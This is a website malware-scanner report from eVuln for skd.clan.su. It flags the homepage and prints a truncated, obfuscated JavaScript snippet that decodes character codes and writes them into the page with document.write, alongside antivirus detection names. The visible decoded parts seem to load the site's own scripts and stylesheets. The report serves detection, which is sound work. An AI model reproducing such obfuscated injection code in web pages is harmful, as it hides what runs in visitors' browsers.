Malware Scanner report for skd.clan.su

Malicious/Suspicious/Total urls checked: 1/0/15

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://skd.clan.su/	200 OK Content-Length: 38911 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 ... 633 bytes are skipped ...16!101!100!99!111!108!108!97!112!115!101!46!106!115!34!62!60!47!115!99!114!105!112!116!62!13!10!60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!47!106!115!47!99!111!110!116!101!110!116!115!108!105!100!101!114!46!106!115!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s15.ucoz.net/src/jquery-1.7.2.js	200 OK Content-Length: 94840 Content-Type: text/javascript	clean
http://s15.ucoz.net/src/ulightbox/ulightbox.js	200 OK Content-Length: 22097 Content-Type: text/javascript	clean
http://s15.ucoz.net/src/uwnd.js?2	200 OK Content-Length: 228554 Content-Type: text/javascript	clean
http://skd.clan.su/media/?t=video;w=250;h=200;f=http%3A%2F%2Fskd.clan.su%2Fparapa_180x180_4.swf	200 OK Content-Length: 319 Content-Type: text/javascript	clean
http://skd.clan.su/media/?t=video;w=250;h=350;f=http%3A%2F%2Fskd.clan.su%2Fsoundtrack2.swf	200 OK Content-Length: 309 Content-Type: text/javascript	clean
http://skd.clan.su/js/dropdowncontent.js	200 OK Content-Length: 5536 Content-Type: text/javascript	clean
http://counter.rambler.ru/top100.jcn?1876453	200 OK Content-Length: 6853 Content-Type: application/x-javascript	clean
http://skd.clan.su/forum	200 OK Content-Length: 42970 Content-Type: text/html	clean
http://skd.clan.su/forum/0-0-1-34	200 OK Content-Length: 61745 Content-Type: text/html	clean
http://skd.clan.su/forum/0-0-1-35	200 OK Content-Length: 22662 Content-Type: text/html	clean
http://skd.clan.su/forum/0-0-0-36	200 OK Content-Length: 17027 Content-Type: text/html	clean
http://skd.clan.su/forum/0-0-0-6	200 OK Content-Length: 15312 Content-Type: text/html	clean
http://skd.clan.su/board/	503 Service Temporarily Unavailable Content-Length: 4509 Content-Type: text/html	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js	200 OK Content-Length: 93100 Content-Type: text/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: skd.clan.su

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 14 Dec 2014 06:59:39 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduzll=1418540379; path=/; expires=Mon, 14-Dec-2015 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;

Second query (visit from search engine):
GET / HTTP/1.1
Host: skd.clan.su
Referer: http://www.google.com/search?q=skd.clan.su

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=skd.clan.su

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://skd.clan.su/

Result: skd.clan.su is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for skd.clan.su

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools